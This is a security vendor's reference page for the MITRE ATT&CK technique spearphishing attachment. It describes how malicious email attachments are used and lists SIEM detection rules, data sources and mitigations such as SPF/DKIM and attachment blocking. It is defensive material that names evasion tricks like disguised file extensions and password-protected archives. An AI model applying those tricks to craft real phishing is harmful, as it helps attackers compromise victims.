T1566.001: Spearphishing Attachment
Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon User Execution to gain execution. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.
There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.
Positive Technologies products that cover the technique
MaxPatrol SIEM knowledge base
unix_mitre_attck_initial_access: PT-CR-2477: Unix_Process_Started_Via_Office_Macros: A process was started using a LibreOffice macro mitre_attck_persistence: PT-CR-2649: Outlook_Form_Exploitation: Outlook started a suspicious process after creating a custom form in the Outlook client. This may indicate an attacker's attempt to gain persistence in the system or execute arbitrary code. mitre_attck_initial_access: PT-CR-2416: Start_Process_From_MOTW_Archive: A user opened an encrypted ZIP archive using a native OS tool and launched a file mitre_attck_initial_access: PT-CR-2447: WMI_Execution_Via_VBA_Macro: A process was created using a Windows Management Instrumentation command from a Microsoft Office document macro mitre_attck_initial_access: PT-CR-2301: Suspicious_File_Creation_From_Messenger_Or_Mail: A file with a suspicious extension was created on behalf of an instant messenger or email program, or malicious file activity was detected. This may indicate a phishing attack or malware being delivered to user's computer. mitre_attck_initial_access: PT-CR-2945: Potential_Rogue_RDP_Attack: A user opened a file with the .rdp extension and established an RDP connection. This may indicate a Rogue RDP attack that can result in data leakage via a fake RDP connection. vulnerabilities: PT-CR-1375: Windows_Contacts_RCE: Possible exploitation of vulnerability CVE-2022-44666 in Windows Contacts vulnerabilities: PT-CR-892: Possible_CVE_2021_1647: Possible exploitation of vulnerability CVE-2021-1647 in Windows Defender vulnerabilities: PT-CR-779: MSDT_CVE_2022_30190: The ms-msdt protocol was used to exploit vulnerability CVE-2022-30190 (Follina) in Microsoft Support Diagnostic Tool (MSDT) mitre_attck_execution: PT-CR-605: Office_File_With_Macros: A user opened a Microsoft Office document with a macro mitre_attck_execution: PT-CR-345: Malicious_Office_Document: A suspicious sequence of process startup by a Microsoft Office application is detected mitre_attck_execution: PT-CR-648: Suspicious_Child_From_Messenger_Process: A user started a process from a parent messenger process mitre_attck_execution: PT-CR-2664: Outlook_VBA_Addin_Load: The Outlook process loaded library "Microsoft VBA for Outlook Addin" (OUTLVBA.DLL). This may indicate the use of VBA macros to execute arbitrary code. process_chains_and_logons: PT-CR-1213: Suspicious_Messenger_Process_Chain: Suspicious process start chain for instant messenger programs process_chains_and_logons: PT-CR-950: Suspicious_Office_Process_Chain: Suspicious process start chain for Microsoft Office or Adobe Acrobat applications yandex_360: PT-CR-2472: Yandex_360_Spam_Attack_By_Title: Multiple emails with the same subject in Yandex 360, which may indicate spam mailing yandex_360: PT-CR-2473: Yandex_360_Spam_Attack_By_Source: Multiple emails from the same sender in Yandex 360, which may indicate spam mailing postfix: PT-CR-2711: Postfix_Suspicious_Sender: Unusual characters in a sender's address. This may indicate the exploitation of the CVE-2020-12063 vulnerability, which allows visually spoofing another sender's address and sending a message without authentication. postfix: PT-CR-2712: Postfix_Message_From_Wrong_Username: The email address of a sender does not match their authentication data. This could be a phishing attempt. hacking_tools: PT-CR-2870: PhantomCore_Tools_Usage: Activity specific to the PhantomRAT remote access trojan or its loader PhantomDL. Signs of activity: DNS queries to domains to determine the public IP address, download of libraries for working with WMI and the network configuration, or child process start to obtain the user's domain from a double extension process. vk_workmail: PT-CR-2996: VK_Workmail_Emails_Mark_Spam: An email was marked as spam. This may indicate a phishing or malicious content distribution attempt. vk_workmail: PT-CR-2998: VK_Workmail_User_Marked_As_Spammer: A user was marked as spammer. This may indicate a phishing or malicious content distribution attempt. antimalware: PT-CR-2080: KSMG_Malware_Detect_And_Clean: A malicious object was found in an email. The problem was solved. antimalware: PT-CR-727: Sandbox_Spam_Attack_By_Source: Spam delivery from the same sender is detected antimalware: PT-CR-726: Sandbox_Spam_Attack_By_Attachment: Spam delivery with the same attachment is detected antimalware: PT-CR-745: Subrule_Sandbox_Mail_IP: A PT Sandbox event is supplemented with IP address information antimalware: PT-CR-1770: Subrule_Sandbox_Count_Mail_Attachments: A PT Sandbox event is supplemented with attachment count information antimalware: PT-CR-3008: Spam_Mail_Detected: An email was detected that may be spam. The email was marked as spam. antimalware: PT-CR-729: Subrule_Sandbox_Mail_Attachment: A PT Sandbox event is supplemented with attachment information antimalware: PT-CR-728: Sandbox_Spam_Attack_By_Title: Spam delivery with the same subject is detected antimalware: PT-CR-723: Subrule_Sandbox_File_Verdict: Result of a file check by PT Sandbox antimalware: PT-CR-2085: KSMG_Malware_Remove: A malicious object is found and deleted from an email antimalware: PT-CR-722: Sandbox_Full_Scan_Malware: PT Sandbox detected an unwanted or malicious object antimalware: PT-CR-2084: KSMG_Encrypted_Message_Detected: An encrypted file object was found in an email
Detection
| ID | DS0029 | Data source and component | Network Traffic: Network Traffic Flow | Description | Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. |
|---|
| ID | DS0029 | Data source and component | Network Traffic: Network Traffic Content | Description | Monitor and analyze SSL/TLS traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)). Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed. |
|---|
| ID | DS0015 | Data source and component | Application Log: Application Log Content | Description | Monitor for third-party application logging, messaging, and/or other artifacts that may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed. Anti-virus can potentially detect malicious documents and attachments as they're scanned to be stored on the email server or on the user's computer. Monitor for suspicious descendant process spawning from Microsoft Office and other productivity software. |
|---|
| ID | DS0022 | Data source and component | File: File Creation | Description | Monitor for newly constructed files from a spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. |
|---|
Mitigation
| ID | M1049 | Name | Antivirus/Antimalware | Description | Anti-virus can also automatically quarantine suspicious files. |
|---|
| ID | M1031 | Name | Network Intrusion Prevention | Description | Network intrusion prevention systems and systems designed to scan and remove malicious email attachments can be used to block activity. |
|---|
| ID | M1054 | Name | Software Configuration | Description | Use anti-spoofing and email authentication mechanisms to filter messages based on validity checks of the sender domain (using SPF) and integrity of messages (using DKIM). Enabling these mechanisms within an organization (through policies such as DMARC) may enable recipients (intra-org and cross domain) to perform similar message filtering and validation. |
|---|
| ID | M1017 | Name | User Training | Description | Users can be trained to identify social engineering techniques and spearphishing emails. |
|---|
| ID | M1021 | Name | Restrict Web-Based Content | Description | Block unknown or unused attachments by default that should not be transmitted over email as a best practice to prevent some vectors, such as .scr, .exe, .pif, .cpl, etc. Some email scanning devices can open and analyze compressed and encrypted formats, such as zip and rar that may be used to conceal malicious attachments. |
|---|